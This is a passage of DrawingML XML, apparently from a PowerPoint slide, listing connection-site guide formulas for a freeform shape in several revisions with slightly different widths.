              <a:gd name="connsiteX73" fmla="*/ 601661 w 1485190"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 601127 w 1485190"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 609823 w 1485190"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 617169 w 1485190"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 616465 w 1485190"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 619908 w 1485190"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 627446 w 1485190"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 629117 w 1485190"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 646680 w 1485190"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 647105 w 1485190"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 648928 w 1485190"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 635763 w 1485190"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 636264 w 1485190"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 623864 w 1485190"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 609049 w 1485190"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 609714 w 1485190"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 600582 w 1485190"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 587191 w 1485190"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 559921 w 1485190"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 502535 w 1485190"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 451453 w 1485190"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 431547 w 1485190"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 422270 w 1485190"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 409231 w 1485190"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 415230 w 1485190"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 417842 w 1485190"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 394171 w 1485190"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 384058 w 1485190"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 368275 w 1485190"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 365733 w 1485190"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 366726 w 1485190"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 358532 w 1485190"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 339710 w 1485190"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 316267 w 1485190"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 270066 w 1485190"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 242377 w 1485190"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 241503 w 1485190"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 222298 w 1485190"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 235378 w 1485190"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 228120 w 1485190"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 214205 w 1485190"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 222512 w 1485190"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 223700 w 1485190"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 228385 w 1485190"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 220667 w 1485190"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 209973 w 1485190"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 198709 w 1485190"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 200165 w 1485190"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 202401 w 1485190"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 195030 w 1485190"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 164438 w 1485190"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 143388 w 1485190"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 142946 w 1485190"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 128617 w 1485190"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 114036 w 1485190"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 119047 w 1485190"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 104989 w 1485190"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 104670 w 1485190"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 84296 w 1485190"/>
              <a:gd name="connsiteY131" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 83544 w 1485190"/>
              <a:gd name="connsiteY132" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 66467 w 1485190"/>
              <a:gd name="connsiteY133" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 66842 w 1485190"/>
              <a:gd name="connsiteY134" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 46799 w 1485190"/>
              <a:gd name="connsiteY135" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 13103 w 1485190"/>
              <a:gd name="connsiteY136" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 586 w 1485190"/>
              <a:gd name="connsiteY137" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 198854 w 1485190"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 158408 w 1485190"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 145305 w 1472087"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1472087 w 1472087"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1472087 w 1472087"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 208781 w 1472087"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 245374 w 1472087"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 256874 w 1472087"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 281613 w 1472087"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 259170 w 1472087"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 274261 w 1472087"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 291705 w 1472087"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 305745 w 1472087"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 358702 w 1472087"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 374389 w 1472087"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 418094 w 1472087"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 401317 w 1472087"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 378732 w 1472087"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 385896 w 1472087"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 368641 w 1472087"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 395669 w 1472087"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 373661 w 1472087"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 372459 w 1472087"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 387874 w 1472087"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 375261 w 1472087"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 360490 w 1472087"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 410002 w 1472087"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 389077 w 1472087"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 428669 w 1472087"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 475799 w 1472087"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 489367 w 1472087"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 505348 w 1472087"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 538841 w 1472087"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 548440 w 1472087"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 559666 w 1472087"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 560686 w 1472087"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 568027 w 1472087"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 571330 w 1472087"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 572314 w 1472087"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 567948 w 1472087"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 574625 w 1472087"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 571558 w 1472087"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 578388 w 1472087"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 585424 w 1472087"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 588155 w 1472087"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 584859 w 1472087"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 586413 w 1472087"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 593322 w 1472087"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 589178 w 1472087"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 604581 w 1472087"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 610484 w 1472087"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 615217 w 1472087"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 616510 w 1472087"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 614317 w 1472087"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 609797 w 1472087"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 604880 w 1472087"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 601445 w 1472087"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 582098 w 1472087"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 586171 w 1472087"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 571427 w 1472087"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 572576 w 1472087"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 571152 w 1472087"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 557447 w 1472087"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 559045 w 1472087"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 552467 w 1472087"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 553798 w 1472087"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 558152 w 1472087"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 563230 w 1472087"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 585824 w 1472087"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 585249 w 1472087"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 585556 w 1472087"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 585583 w 1472087"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 584198 w 1472087"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 583082 w 1472087"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 584815 w 1472087"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 588558 w 1472087"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 588024 w 1472087"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 596720 w 1472087"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 604066 w 1472087"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 603362 w 1472087"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 606805 w 1472087"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 614343 w 1472087"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 616014 w 1472087"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 633577 w 1472087"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 634002 w 1472087"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 635825 w 1472087"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 622660 w 1472087"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 623161 w 1472087"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 610761 w 1472087"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 595946 w 1472087"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 596611 w 1472087"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 587479 w 1472087"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 574088 w 1472087"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 546818 w 1472087"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 489432 w 1472087"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 438350 w 1472087"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 418444 w 1472087"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 409167 w 1472087"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 396128 w 1472087"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 402127 w 1472087"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 404739 w 1472087"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 381068 w 1472087"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 370955 w 1472087"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 355172 w 1472087"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 352630 w 1472087"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 353623 w 1472087"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 345429 w 1472087"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 326607 w 1472087"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 303164 w 1472087"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 256963 w 1472087"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 229274 w 1472087"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 228400 w 1472087"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 209195 w 1472087"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 222275 w 1472087"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 215017 w 1472087"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 201102 w 1472087"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 209409 w 1472087"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 210597 w 1472087"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 215282 w 1472087"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 207564 w 1472087"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 196870 w 1472087"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 185606 w 1472087"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 187062 w 1472087"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 189298 w 1472087"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 181927 w 1472087"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 151335 w 1472087"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 130285 w 1472087"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 129843 w 1472087"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 115514 w 1472087"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 100933 w 1472087"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 105944 w 1472087"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 91886 w 1472087"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 91567 w 1472087"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 71193 w 1472087"/>
              <a:gd name="connsiteY131" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 70441 w 1472087"/>
              <a:gd name="connsiteY132" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 53364 w 1472087"/>
              <a:gd name="connsiteY133" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 53739 w 1472087"/>
              <a:gd name="connsiteY134" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 33696 w 1472087"/>
              <a:gd name="connsiteY135" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 0 w 1472087"/>
              <a:gd name="connsiteY136" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 173467 w 1472087"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 185751 w 1472087"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 145305 w 1472087"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 112107 w 1438889"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1438889 w 1438889"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1438889 w 1438889"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 175583 w 1438889"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 212176 w 1438889"/>
